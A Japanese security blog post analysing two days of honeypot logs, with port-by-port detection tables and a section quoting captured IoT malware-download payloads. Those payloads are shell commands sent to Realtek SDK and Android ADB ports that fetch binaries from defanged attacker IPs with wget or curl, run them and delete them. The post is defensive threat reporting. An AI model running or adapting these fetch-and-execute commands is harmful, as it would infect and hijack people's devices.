ハニーポット分析(9,10日目:8/16,8/17)

今回は、2日分をまとめて分析しています。１週間分のログも溜まってたので、休み中に頑張って、週次レポート的なものは作りたいと思います。

Honeytrap分析
8月16日(木)
検知数：7044件（ペイロード有：2905件）
＜宛先ポート別 TOP10＞

宛先ポート	サービス	検知数	割合	攻撃概要
445	SMB	1,535	52.84%	調査行為
3389	RDP	155	5.34%	調査行為
81	HTTP	136	4.68%	調査行為
52869	D-Link, Realtek SDK	49	1.69%	マルウェアダウンロード
1433	Microsoft SQL Server	48	1.65%	調査行為
8088	Asterisk (PBX) Web Configuration utility	47	1.62%	/conf へのアクセス
8080	PROXY	46	1.58%	調査行為
5555	Android Debug Bridge (ADB)	42	1.45%	マルウェアダウンロード
465	SMTPS	34	1.17%	調査行為
5901	VNC	33	1.14%	調査行為

8月17日(金)
検知数：5697件（ペイロード有：2895 件）
＜宛先ポート別 TOP10＞

宛先ポート	サービス	検知数	割合	攻撃概要
445	SMB	1,496	51.68%	調査行為
3389	RDP	72	2.49%	調査行為
2222	SSH	63	2.18%	調査行為
1962	?	63	2.18%	調査行為
1433	Microsoft SQL Server	55	1.90%	調査行為
8088	Asterisk (PBX) Web Configuration utility	44	1.52%	/conf へのアクセス
8080	PROXY	36	1.24%	調査行為
52869	D-Link, Realtek SDK	35	1.21%	マルウェアダウンロード
175	VMNET	33	1.14%	調査行為
5357	Web Services on Devices	33	1.14%	調査行為

＜マルウェアダウンロード＞

いずれもIoTを狙ったものと思われます。

ポート：52869
ペイロード：
POST /picsdesc.xml
・cd /tmp/;wget hxxp://107[.]191[.]99[.]41/elf[.]mips -O elf
・cd /var/; wget hxxp://80[.]211[.]67[.]245/mips -O am; chmod +x am; [.]/am mips
・cd /tmp/;wget hxxp://159[.]65[.]232[.]56/xd[.]mips
・cd /tmp/;wget hxxp://167[.]99[.]196[.]170/xd[.]mips

ポート：5555
ペイロード：
・sshell:cd /data/local/tmp;wget hxxp://207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp://207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp://207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp://207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;

・shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp://185[.]162[.]130[.]187/adbs -O -> adbs; sh adbs; curl hxxp://185[.]162[.]130[.]187/adbs2 > adbs2; sh adbs2; rm adbs adbs2

日次の分析では、マルウェアの分析と急増したポートに関しての考察をしていこうかなと思っています。結構細かく見ようとすると大変なので。。。。。

以上、ハニーポットの分析でした。

sec-chick Blog

サイバーセキュリティブログ

ハニーポット分析(9,10日目:8/16,8/17)